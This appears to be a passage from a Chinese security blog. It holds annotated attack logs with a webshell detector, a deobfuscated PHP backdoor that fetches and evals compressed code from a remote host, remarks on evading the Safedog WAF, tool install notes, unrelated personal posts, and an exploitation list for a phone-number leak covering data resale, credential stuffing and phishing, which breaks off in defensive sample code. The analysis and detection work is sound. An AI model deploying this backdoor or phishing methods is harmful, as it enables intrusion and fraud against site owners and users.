138.128.212.179 – – [16/Jul/2016:00:17:52 +0800] “GET /Uploads/Pic/2016-07-16/57890caaf344c.1 HTTP/1.1” 200 32 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”

// Changed the extension again

138.128.212.179 – – [16/Jul/2016:00:18:45 +0800] “POST /Public/Uploadify/demo.php HTTP/1.1” 404 1331 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”

// Requesting demo.php: page does not exist

138.128.212.179 – – [16/Jul/2016:00:18:53 +0800] “POST /Uploads/Pic/2016-07-16/57890c7e951de.vbak HTTP/1.1” 405 166 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [16/Jul/2016:00:18:58 +0800] “POST /Uploads/Pic/2016-07-16/57890c7e951de.vbak HTTP/1.1” 405 166 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”

// Requesting the uploaded webshell: 405

138.128.212.179 – – [16/Jul/2016:00:23:29 +0800] “GET /Public/kindeditor/php/upload.php HTTP/1.1” 200 0 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”

// The attacker found another upload point

138.128.212.179 – – [16/Jul/2016:00:23:51 +0800] “POST /Public/kindeditor/php/upload.php HTTP/1.0” 200 144 “http://slbvip.com” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
138.128.212.179 – – [16/Jul/2016:00:23:52 +0800] “POST /Public/kindeditor/php/upload.php HTTP/1.0” 200 290 “http://slbvip.com” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
138.128.212.179 – – [16/Jul/2016:00:23:53 +0800] “POST /Public/kindeditor/php/upload.php HTTP/1.0” 200 1526 “http://slbvip.com” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
138.128.212.179 – – [16/Jul/2016:00:24:01 +0800] “POST /Public/kindeditor/php/upload.php HTTP/1.0” 200 6514 “http://slbvip.com” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”

// Several upload attempts, still not getting through.

138.128.212.179 – – [19/Jul/2016:16:21:46 +0800] “GET /Uploads/146891188257179.jpg HTTP/1.1” 200 150958 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:21:55 +0800] “GET /Uploads/146890768218257.png HTTP/1.1” 200 78289 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:22:01 +0800] “GET /Uploads/146890724044584.png HTTP/1.1” 200 87084 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:22:10 +0800] “GET /Uploads/146890703177801.jpg HTTP/1.1” 200 44256 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:22:16 +0800] “GET /Uploads/146890694154072.png HTTP/1.1” 200 81028 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:22:22 +0800] “GET /Uploads/146890667880773.png HTTP/1.1” 200 69520 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:22:30 +0800] “GET /Uploads/146890663744137.png HTTP/1.1” 200 100128 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:22:37 +0800] “GET /Uploads/146890655699351.png HTTP/1.1” 200 135056 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:22:44 +0800] “GET /Uploads/146890646027724.png HTTP/1.1” 200 103372 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:22:50 +0800] “GET /Uploads/146890637216135.png HTTP/1.1” 200 108561 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:22:55 +0800] “GET /Uploads/146890628924480.png HTTP/1.1” 200 104940 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:23:00 +0800] “GET /Uploads/146890463858741.png HTTP/1.1” 200 82636 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:23:06 +0800] “GET /Uploads/146890438128119.jpg HTTP/1.1” 200 182931 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:23:16 +0800] “GET /Uploads/146890436882884.jpg HTTP/1.1” 200 182931 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:23:32 +0800] “GET /Uploads/146890420781045.png HTTP/1.1” 200 126604 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:23:43 +0800] “GET /Uploads/146890419983679.jpg HTTP/1.1” 200 51284 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:23:53 +0800] “GET /Uploads/146890362678175.png HTTP/1.1” 200 85621 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:24:00 +0800] “GET /Uploads/146890345652557.png HTTP/1.1” 200 83409 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:24:35 +0800] “POST /Public/kindeditor/php/upload.php HTTP/1.0” 200 186 “http://slbvip.com” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”

// The images the attacker uploaded above: even if they contain malicious code it cannot execute, unless a parsing vulnerability is used;
// Finally the attacker scanned a little more and then the logs stop. That concludes this reverse penetration log analysis.
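The pattern traced by hand above (a successful POST to an upload endpoint, then a fresh .php under the upload path answering 200 from the same IP) can be checked mechanically. Below is an added example, not part of the original write-up: a parser for the combined log format seen in the excerpts plus a replay that reports upload-then-execute drops, non-image files under /Uploads/ (the .vbak and .1 renames) and python-requests scanners. The sample lines are condensed from the post's excerpts, with straight quotes; the upload endpoint and directory names are taken from them.

```python
import os
import re
from datetime import datetime

# Combined log format as it appears in the excerpts above.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
UPLOAD_ENDPOINTS = {"/Home/Common/uploadFace", "/Public/kindeditor/php/upload.php"}
UPLOAD_DIR = "/Uploads/"
IMAGE_EXT = {".jpg", ".jpeg", ".png", ".gif", ".bmp"}
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml)$", re.IGNORECASE)
SCANNER_UA_PREFIX = "python-requests"          # the default UA of the scanner seen above


def parse(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    e["status"] = int(e["status"])
    return e


def analyse(lines, window_seconds=600):
    """Replay the log in time order and return three findings:
    webshell_drops: scripts first seen with a 200 from an IP within window_seconds
        of that IP's successful POST to an upload endpoint (upload-then-execute);
    non_image_in_upload_dir: anything under /Uploads/ that is not an image, which
        catches the renamed .vbak and .1 files even though they never return 200/405 alike;
    scanner_ips: clients whose User-Agent is the python-requests default."""
    events = sorted((e for e in map(parse, lines) if e), key=lambda e: e["ts"])
    last_upload, seen = {}, set()
    drops, odd, scanners = [], [], set()
    for e in events:
        if e["ua"].startswith(SCANNER_UA_PREFIX):
            scanners.add(e["ip"])
        if e["path"] in UPLOAD_ENDPOINTS:            # the endpoint itself is never a drop
            if e["method"] == "POST" and e["status"] == 200:
                last_upload[e["ip"]] = e["ts"]
            continue
        if e["path"].startswith(UPLOAD_DIR):
            ext = os.path.splitext(e["path"])[1].lower()
            if ext not in IMAGE_EXT and e["path"] not in odd:
                odd.append(e["path"])
        if e["status"] == 200 and SCRIPT_EXT.search(e["path"]) and e["path"] not in seen:
            t0 = last_upload.get(e["ip"])
            if t0 is not None and (e["ts"] - t0).total_seconds() <= window_seconds:
                drops.append(e["path"])
        seen.add(e["path"])
    return {"webshell_drops": drops, "non_image_in_upload_dir": odd,
            "scanner_ips": sorted(scanners)}


# Constructed sample: lines condensed from the excerpts above, straight quotes.
SAMPLE_LOG = """\
138.128.212.179 - - [14/Jul/2016:18:41:21 +0800] "GET /1.log HTTP/1.1" 404 791 "-" "python-requests/2.10.0"
138.128.212.179 - - [14/Jul/2016:18:41:32 +0800] "GET /phpMyAdmin/ HTTP/1.1" 404 791 "-" "python-requests/2.10.0"
223.104.91.228 - - [15/Jul/2016:01:03:00 +0800] "POST /Home/Index/tgbzcl HTTP/1.1" 200 86 "http://www.slbvip.com/Home/Index/home1" "Mozilla/5.0 (iPhone)"
138.128.212.179 - - [15/Jul/2016:17:21:55 +0800] "POST /Home/Common/uploadFace HTTP/1.1" 200 59 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [15/Jul/2016:17:22:25 +0800] "POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1" 200 51 "http://www.slbvip.com" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0"
138.128.212.179 - - [15/Jul/2016:17:24:36 +0800] "POST /Public/Uploadify/demo.php HTTP/1.1" 200 119 "http://www.slbvip.com" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0"
138.128.212.179 - - [16/Jul/2016:00:17:02 +0800] "POST /Home/Common/uploadFace HTTP/1.1" 200 60 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [16/Jul/2016:00:17:11 +0800] "POST /Uploads/Pic/2016-07-16/57890c7e951de.vbak HTTP/1.1" 405 166 "http://www.slbvip.com" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0"
138.128.212.179 - - [16/Jul/2016:00:17:52 +0800] "GET /Uploads/Pic/2016-07-16/57890caaf344c.1 HTTP/1.1" 200 32 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [19/Jul/2016:16:21:46 +0800] "GET /Uploads/146891188257179.jpg HTTP/1.1" 200 150958 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
"""

if __name__ == "__main__":
    for key, value in analyse(SAMPLE_LOG.splitlines()).items():
        print(key, value)
```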

Analysis of a PHP backdoor

<?php
$password='123';
//----------functional code------------------//
$c="chr";//string: alias for chr(), used to assemble every name below one character at a time
session_start();

if(empty($_SESSION['PhpCode'])){
$url.=$c(104).$c(116).$c(116).$c(112).$c(58);
$url.=$c(47).$c(47).$c(104).$c(106).$c(105);
$url.=$c(117).$c(46).$c(108).$c(97).$c(47);
$url.=$c(115).$c(99).$c(120).$c(112).$c(46);
$url.=$c(103).$c(105).$c(102);

//$url = chr(104)chr(116)chr(116)chr(112)chr(58)chr(47)chr(47)chr(104)chr(106)chr(105)chr(117)chr(46)chr(108)chr(97)chr(47)chr(115)chr(99)chr(120)chr(112)chr(46)chr(103)chr(105)chr(102)

//$url = http://hjiu.la/scxp.gif

$get=chr(102).chr(105).chr(108).chr(101).chr(95);
$get.=chr(103).chr(101).chr(116).chr(95).chr(99);
$get.=chr(111).chr(110).chr(116).chr(101).chr(110);
$get.=chr(116).chr(115);

//$get = chr(102)chr(105)chr(108)chr(101)chr(95)chr(103)chr(101)chr(116)chr(95)chr(99)chr(111)chr(110)chr(116)chr(101)chr(110)chr(116)chr(115)

//$get = file_get_contents

echo  $get($url);

$_SESSION['PhpCode']=$get($url);
}

//echo $url;

$unzip=$c(103).$c(122).$c(105).$c(110);
$unzip.=$c(102).$c(108).$c(97).$c(116).$c(101);
//echo $unzip;//die;

//chr(103).chr(122).chr(105).chr(110)chr(102).chr(108).chr(97).chr(116).chr(101)

//$unzip = gzinflate, which decompresses the fetched payload before eval
@eval($unzip($_SESSION['PhpCode']));

?>

Tonight I helped a customer analyse a backdoor program; the analysis is above. I tried it against Safedog (安全狗) and it did not get past; a plain eval will certainly be caught, but with a few changes it could probably bypass Safedog. It is a clever approach: pulling encrypted backdoor code from a remote server to get around the WAF.
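The chr()-concatenation above can be undone statically, which is how a defender reads such a sample without executing it. The following is an added example (not from the original post): it resolves aliases such as $c="chr", rebuilds every string assembled with .=chr(n) chains, then reports which dynamic calls ($var(...)) and eval those strings feed, so the chain file_get_contents -> gzinflate -> eval can be read off. The sample is the backdoor from the post, condensed; the function names are mine.

```python
import re

ALIAS_RE = re.compile(r'\$(\w+)\s*=\s*"(\w+)"\s*;')            # $c="chr";
ASSIGN_RE = re.compile(r'\$(\w+)\s*(\.?=)\s*([^;]+);')           # $url.=...; / $get=...;
CALL_RE = re.compile(r'(?:\$(\w+)|(chr))\((\d+)\)')              # $c(104) or chr(104)
DYNCALL_RE = re.compile(r'\$(\w+)\(\s*(\$\w+(?:\[[^\]]*\])?|[^()]*)\)')  # $get($url)


def resolve_chr_strings(src):
    """Return {variable: decoded string} for every variable built purely from
    chr()-style calls, honouring function-name aliases ($c="chr")."""
    aliases = {name for name, fn in ALIAS_RE.findall(src) if fn == "chr"}
    strings = {}
    for var, op, rhs in ASSIGN_RE.findall(src):
        parts = CALL_RE.findall(rhs)
        if not parts:
            continue                      # not a chr() chain (e.g. $password='123')
        if any(alias and alias not in aliases for alias, _, _ in parts):
            continue                      # $x(n) where $x is not known to be chr
        decoded = "".join(chr(int(n)) for _, _, n in parts)
        prefix = strings.get(var, "") if op == ".=" else ""
        strings[var] = prefix + decoded
    return strings


def explain_dynamic_calls(src):
    """List (variable, resolved function name, argument) for each $var(arg) whose
    name was assembled from chr() calls; unresolved variables are skipped."""
    strings = resolve_chr_strings(src)
    return [(var, strings[var], arg) for var, arg in DYNCALL_RE.findall(src) if var in strings]


def summarize(src):
    """Decoded strings, the dynamic call chain, and whether eval consumes a dynamic call."""
    calls = explain_dynamic_calls(src)
    return {
        "strings": resolve_chr_strings(src),
        "chain": [f"{fn}({arg})" for _, fn, arg in calls],
        "eval_of_dynamic_call": bool(re.search(r'eval\s*\(\s*\$\w+\(', src)),
    }


# The backdoor from the post, condensed to the lines that matter (constructed sample).
SAMPLE_PHP = r'''<?php
$password='123';
$c="chr";
session_start();
if(empty($_SESSION['PhpCode'])){
$url.=$c(104).$c(116).$c(116).$c(112).$c(58);
$url.=$c(47).$c(47).$c(104).$c(106).$c(105);
$url.=$c(117).$c(46).$c(108).$c(97).$c(47);
$url.=$c(115).$c(99).$c(120).$c(112).$c(46);
$url.=$c(103).$c(105).$c(102);
$get=chr(102).chr(105).chr(108).chr(101).chr(95);
$get.=chr(103).chr(101).chr(116).chr(95).chr(99);
$get.=chr(111).chr(110).chr(116).chr(101).chr(110);
$get.=chr(116).chr(115);
$_SESSION['PhpCode']=$get($url);
}
$unzip=$c(103).$c(122).$c(105).$c(110);
$unzip.=$c(102).$c(108).$c(97).$c(116).$c(101);
@eval($unzip($_SESSION['PhpCode']));
?>'''

if __name__ == "__main__":
    for key, value in summarize(SAMPLE_PHP).items():
        print(key, value)
```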

Installing common Python libraries: a round-up

Installing easy_install
Download: https://pypi.python.org/pypi/ez_setup
Unpack and install: python ez_setup.py

Installing pip
Download: https://pypi.python.org/pypi/pip
Unpack and install: python setup.py install
On Linux, install the setuptools dependency first:
wget http://pypi.python.org/packages/source/s/setuptools/setuptools-2.0.tar.gz
tar zxvf setuptools-2.0.tar.gz
cd setuptools-2.0
python setup.py build
python setup.py install
wget https://pypi.python.org/packages/e7/a8/7556133689add8d1a54c0b14aeff0acb03c64707ce100ecd53934da1aa13/pip-8.1.2.tar.gz#md5=87083c0b9867963b29f7aba3613e8f4a
tar zxvf pip-8.1.2.tar.gz
cd pip-8.1.2/
sudo python setup.py install
######################## If you selected pip when installing Python 2.7.9 you can skip the above; otherwise install pip following the steps above #########

Installing requests

cd into the C:\Python27\Scripts> directory
Run: pip install requests
Test: import requests

Installing lxml
Run: pip install lxml
Test: import lxml
On Windows 7 the install sometimes fails; in that case just download the exe from the official site: https://pypi.python.org/pypi/lxml/3.6.0

Installing beautifulsoup4
Run: pip install beautifulsoup4
Test: from bs4 import BeautifulSoup

Compiling a .py file to .pyc: python -m py_compile demo.py
or
import compileall
compileall.compile_file(r'/home/root/Desktop/demo.py')  # compile_dir() expects a directory; compile_file() takes a single file

Installing py2exe; official download: http://www.py2exe.org/
In the Python directory (usually C:\Python27, depending on where Python is installed) create a setup.py file containing:
from distutils.core import setup
import py2exe
setup(console=["script_to_convert.py"])
From a terminal (cmd) enter the Python27 directory and run
python setup.py py2exe
That completes the conversion from .py to .exe
The generated program is in the dist folder
If the lxml library is used, run python setup.py py2exe -p lxml,gzip instead, otherwise it errors out!


Installing Scrapy # verified: on Windows it needs many dependency libraries and is quite a hassle

1. Install twisted; the dependencies below have to be installed first
# project path: sourceforge.net/projects/pywin32/files/

A. Install zope.interface
Download: https://pypi.python.org/pypi/zope.interface#download
I am on a 32-bit Windows system, so I downloaded the exe from the link below and installed it directly:
https://pypi.python.org/packages/43/a3/7092ca779bf09a50128c45875700ecff55db2de0a98e5ab969b73bdf5e7a/zope.interface-4.2.0.win32-py2.7.exe#md5=e816efeac869c956d1d1da7a985dab8c
# afterwards, import zope.interface to verify the install

B. Install pyopenssl
Download: https://pypi.python.org/pypi/pyOpenSSL#downloads
There are only two files here, a whl for online install and one for offline install; I downloaded the first, the whl:
pip install C:\Users\Administrator\Desktop\pyOpenSSL-16.0.0-py2.py3-none-any.whl
If Python27/Scripts is not in your PATH, cd into the Scripts directory to run it
Once installed, it apparently pulled several other packages in: Successfully installed cffi-1.7.0 cryptography-1.4 enum34-1.1.6 idna-2.1 ipaddress-1.0.16 pyOpenSSL-16.0.0 pyasn1-0.1.9 pycparser-2.14 setuptools-25.1.0
// I only found the 32-bit whl above; a 64-bit whl would work too if you can find one. I found an msi instead: https://www.egenix.com/cryptodownload/?file=egenix-pyopenssl-0.13.0_1.0.0g_1.win-amd64-py2.7.msi
# afterwards, import OpenSSL to verify the install

C. Install twisted
Following what I found online, I got the 64-bit whl and it would never install; my machine is 32-bit and I saw no 32-bit build on the official site, so I searched again and found this download: http://www.newasp.net/soft/77004.html
pip install C:\Users\Administrator\Desktop\Scrapy-1.1.1-py2.py3-none-any.whl
#Installing collected packages: Scrapy, attrs, pyasn1-modules
#Successfully installed Scrapy-1.1.1 attrs-16.0.0 pyasn1-modules-0.0.8
# afterwards, import scrapy to verify the install

## Once everything is installed, typing scrapy on the command line prints the usage. The lxml library is also needed... not covered here...

Installing on Linux: pip install Scrapy # on Linux this apparently pulls in more libraries than installing them one by one on Windows; Linux is recommended
scrapy

Creating a project on Kali gave an error: ##raise VersionConflict(dist, req).with_context(dependent_req)
pkg_resources.ContextualVersionConflict: (pyasn1 0.1.3 (/usr/lib/python2.7/dist-packages), Requirement.parse('pyasn1>=0.1.8'), set(['pyasn1-modules'])). pyasn1 needs upgrading; run the following:
sudo apt-get install python-pip #install pip
sudo pip install --upgrade pip    #upgrade pip
sudo pip install --upgrade pyasn1 #upgrade pyasn1
scrapy startproject spider_app #create the project
#root@0535coder:~# scrapy startproject spider_app
#New Scrapy project 'spider_app', using template directory '/usr/local/lib/python2.7/dist-
#packages/scrapy/templates/project', created in:
#    /root/spider_app
#
#You can start your first spider with:
#    cd spider_app
#    scrapy genspider example example.com


Installing django

pip install django

An idea for easing home-buying in Beijing for non-locals

Renting in Beijing, the rent goes up by 100-500 yuan a year; buying is another matter, with house prices shooting up so fast that anyone with a flat of their own could be the next multi-millionaire before long.
But not everyone in Beijing can buy a full-title (大产权) home. There are purchase-restricted and unrestricted properties: the restricted ones are generally 70-year full-title homes, the unrestricted ones are generally 30-50-year mixed commercial/residential units or relocation housing with no title. Without purchase eligibility, waiting to qualify takes 2-3 years at best and more than 5 years at worst. In those 3-5 years house prices are unlikely to fall, and any fall would be small, and there is no telling what new policies might appear, so it is better to move first.
As far as I know, purchase eligibility requires a residence permit, which can be obtained in two ways. One is a bachelor's degree with a degree certificate, half a year of employment and more than 800 yuan a month in personal income tax; the other conditions are easy, the main problem is the qualification. One can sit exams for a diploma or pay for one, but the degree itself has to be earned, and without a bachelor's degree and degree certificate, getting the permit by upgrading one's education takes at least 2-3 years. The other route is an intermediate professional title, which counts the same as the degree and diploma; the exam is generally held twice a year, and with proper study it should be achievable within 3 years.
Many people can currently only buy commercial units, not full-title homes. Here I suddenly had an idea, and I am not sure whether it is sound: first buy a 30-50-year small-title commercial unit. New ones generally need a 50% down payment, second-hand ones 70-90%, and the remaining 50% or 30%-10% can be mortgaged; pay the loan off within 5-10 years, then use the unit as collateral for a further loan.
Problem one: can a commercial unit be used as collateral for a home purchase? Normally yes, but can a small-title property back a down-payment loan? I asked the bank and apparently not; I do not know whether there is a way around this.
Assuming the collateral loan goes through, the unit could raise 300k (50% of its original value). With the money raised, the rent from letting the unit would repay the collateral loan within 10 years. During the 5-10 years, or perhaps only 3 years, spent repaying the first property, the residence permit might come through and a 70-year residential home could be bought.
Another problem: there are currently two routes to the permit, a degree and diploma or an intermediate title, and I chose the title. Over such a long period, might the rules change, and will the permit actually be obtained? This is less serious: without the permit one can still buy another off-plan commercial unit and repay the new loan oneself.
Whether the two-home plan can work depends entirely on finding a way to get the down-payment loan.
// Checked with several friends and with colleagues and managers at work: not feasible...

Installing the new VMware Tools on Kali 2016

In older versions you could simply install the VMware Tools provided by the hypervisor; in the new version the bundled package does not work and it has to be installed with apt-get, as follows:
One problem I ran into before installing: "This virtual machine is configured for 64-bit guest operating systems. However, 64-bit operation is not possible." Searching online, the BIOS needs to be changed:
enable Security -> Virtualization -> Intel Virtualization Technology in the BIOS;
Below are the commands to install VMware Tools on the new Kali. Update the package sources first, otherwise the packages will not be found; see: http://0535code.com/article/20160810_972.shtml
When adding sources, you must include the USTC mirror, otherwise several other dependencies will be missing:
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
apt-get update
apt-get install open-vm-tools-desktop fuse
reboot
Copying several files at once often hits a bug and not all of them arrive; the missing files can be recovered from the /tmp/VMwareDnD directory!

Burp Suite: capturing SSL traffic from an iOS phone and the certificate problem

After installing Firefox it reports ssl_error_weak_server_ephemeral_dh_key, while IE shows nothing. Normally this does not happen; it turned out to be caused by the installed JDK version: an older JDK does not trigger it, a newer one does in Firefox (I forget the exact version). The message translates to weak keys not being supported; to get past it, install this add-on:
https://addons.mozilla.org/en-us/firefox/addon/disable-dhe/
Today, opening a site at https://hd.faisco.cn/**** from WeChat on iOS, I could not capture the traffic. One workaround is to install the desktop WeChat client on the PC, which can definitely be captured; I had tried that before. After much fiddling and with a colleague's help I understood the reason, so I am recording and sharing it here.
HTTPS comes in one-way and mutual authentication: in one-way authentication only the client has a certificate, in mutual authentication both the client and the server need certificates; the client's one-way certificate is further divided into symmetric and asymmetric encryption. Everything I had met before was symmetric, where Burp Suite automatically forges a CA certificate; with asymmetric encryption the certificate has to be imported, and that was the problem this time.
First open the target site in Firefox; at the bottom there is an Add Exception button, and from that dialog the PortSwigger.der certificate can be exported. Then set up a local web site, put the certificate in its root directory, and browse to http://192.168.1.11/PortSwigger.der from the built-in iOS browser; it prompts to install, install it, and afterwards the site's traffic can be captured normally.

Web security engineer / web penetration tester interview summary

Interviewing again after several years of work is different from the early days. Right after graduation interviews were mostly written tests followed by a few questions, and back then I almost never received interview invitations from BAT; had I received one, I might have learned the ways of interviewing long ago. One earlier interview left a deep mark: the three terms "familiar with", "proficient in" and "expert in" differ enormously. Almost every job posting uses two of them. "Familiar with" does not mean having heard of a thing but having used it, unless it is an internship, where the bar is lower. "Proficient" means using it fluently, in both ordinary and advanced ways; otherwise, when asked about one point you have never heard of or used, it gets awkward. "Expert" means having your own insight into every detail: at the proficient level you know the approach and, if stuck, can describe it abstractly; at the expert level abstract answers are not acceptable, you must be concrete. So in later interviews I read every "familiar", "proficient" and "expert" requirement carefully, and if there was any fuzzy point I did not waste either side's time.
With some experience behind me, I interviewed at 3-4 companies this time and noticed a common pattern: at least two rounds, usually a technical round or a management round first; the order sometimes changes, but generally when the technical side has time they interview first, and only after passing do you get the manager. Some add an HR round, some skip it; if the organisation is more complex there are more rounds, at most five; the most I faced this time was three: a technical round, a CEO round, and an HR manager round. I also met one company where technical and management interviewed together and gave the result on the spot. Whatever the number of rounds, it comes down to technical skill and EQ. The so-called EQ is mainly about problem-solving ability: once you know the technology, how you go about a problem you do not understand. This really matters: some people solve it in a few hours, others take ten-odd times as long. Efficiency matters. EQ is usually assessed by management, and the questions are almost always the same; the classic one is: tell me about the most memorable experience in your work. In my first interview I had prepared nothing, my brain turned to mush, I said there was nothing, and failed immediately. It was not that there was nothing; there was plenty, I just was not in the zone. For non-technical management, this question probes your experience and whether you have the mindset and ability to solve problems independently; to grow into an experienced engineer you must have been through countless hard problems. Saying "nothing" signals low EQ; some people know only a little but can inflate that little and sail through the EQ interview. There is a whole series of other EQ-related questions, and this round matters a great deal; one slip and you are out. Many technical people have low EQ; with a high degree and strong background management does not weigh it as heavily, since those can compensate for EQ, but an ordinary candidate gets that hurdle set in front of them, though for a smart candidate the hurdle makes no difference. Beyond the EQ round, in the technical round, or in the EQ round if the manager knows technology, they will pick a technical point you are familiar with, first ask a few questions to check your breadth, then take one point and drill into it: why A? You say because B. Why B? Because C. Why C? Because D... indefinitely, as deep as you can go. The best outcome is to answer all the way to the point where even the technical interviewer cannot judge whether the answer is correct, haha.
From this recent round of interviews, I think there is a technical round and an EQ round, and you must prepare:
1. One very deep technical point, deep enough that no material on it can be found online (this assumes a certain breadth already, otherwise you fail at the breadth questions and never get asked the deep ones);
2. One unforgettable project experience, or several; this is for the EQ interviewer. Do not underestimate them: EQ interviewers are the most advanced, like the "no form beats every form" level in martial-arts fiction. Watch every step; there is a knife behind every sentence, be careful at all times.
I also interviewed with the 360 attack-and-defense lab: two phone calls; I declined the second because I had already accepted an offer from another company. At 360 and BAT-type companies, over-preparing is pointless: the technical assessment is just the basics, checking your level of knowledge, which is not especially important as long as the basics are there; what matters is logic and algorithms, both of which must pass, unless your research is very deep in cutting-edge technology.

New ways to exploit user information leak vulnerabilities

User data in the finance industry is quite valuable, and there are many ways to obtain it: SQL injection, XSS, command execution, unauthorised interface queries and so on. Today I ran into an unauthorised query vulnerability: the interface had a captcha that is refreshed on the front end and validated on the back end; for that kind, the front-end request can simply be dropped. It was on the registration page: if the user is already registered it reports that the user exists; if not, it sends a verification code to validate the phone number. After bypassing the captcha, you can tell which phone numbers are registered and which are not. It is a simple information leak, but what harm does it do and how is it exploited? As a white hat there is little research on this; grey hats have many approaches. Here are the exploitation methods I have summarised.
1. In the black market the user's password is not needed, the phone number alone is enough; through other interfaces the number owner's name and ID number can be looked up, making the data more precise and raising its quality. A large enough database sells for a good price: a single information leak converts directly into commercial value.
2. In other industries outside finance, knowing the phone number alone is of little use; the data inside the account is what has value. One not-so-reliable approach is to collect your own social-engineering database resources; if your own are not strong enough, buy some online, verifying a sample first since it is easy to get scammed. Then write a script to run credential stuffing against the social-engineering database. I call this unreliable because the cost is high and the result may well fall short.
3. Continuing from 2, a newer trick is direct phishing: build a fake page or simply clone the site, record the desired accounts and passwords, convert the URL with a short-domain service in case the address gets blocked, and send it to the phone number or email; having the target actively hand over the information is more reliable. Even a finance site's payment password can be obtained this way, let alone other industries.
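What makes the enumeration above possible is that the captcha check is effectively decided in the browser and the two replies ("user exists" versus "code sent") differ. The following is an added example, not code from the original post or from the affected site: a Python stand-in for the registration handler, the vulnerable form next to a hardened one that consumes a server-issued single-use captcha, rate-limits each client, and returns one identical message whether or not the number is registered. The phone numbers, in-memory stores and `send_sms` stub are constructed sample data.

```python
import secrets
from collections import defaultdict, deque
# Constructed sample data standing in for the user database and SMS gateway.
REGISTERED = {"13800000001", "13800000002"}
SENT_SMS = []
GENERIC = "If the number is eligible, a verification code has been sent"

def send_sms(phone):
    SENT_SMS.append(phone)

# Vulnerable: captcha result is a flag the browser computes; replies reveal registration state.
def register_vulnerable(phone, client_says_captcha_ok):
    if not client_says_captcha_ok:      # any client can simply send True
        return "captcha failed"
    if phone in REGISTERED:
        return "user already exists"    # oracle for registered numbers
    send_sms(phone)
    return "verification code sent"

# Hardened: server-issued single-use captcha with expiry, per-client rate limit, one reply.
_captchas = {}                          # token -> (expected answer, expiry time)
_hits = defaultdict(deque)              # client id -> recent request timestamps
CAPTCHA_TTL, LIMIT, WINDOW = 300, 5, 60

def issue_captcha(answer, now):
    token = secrets.token_urlsafe(16)   # unguessable handle stored server-side
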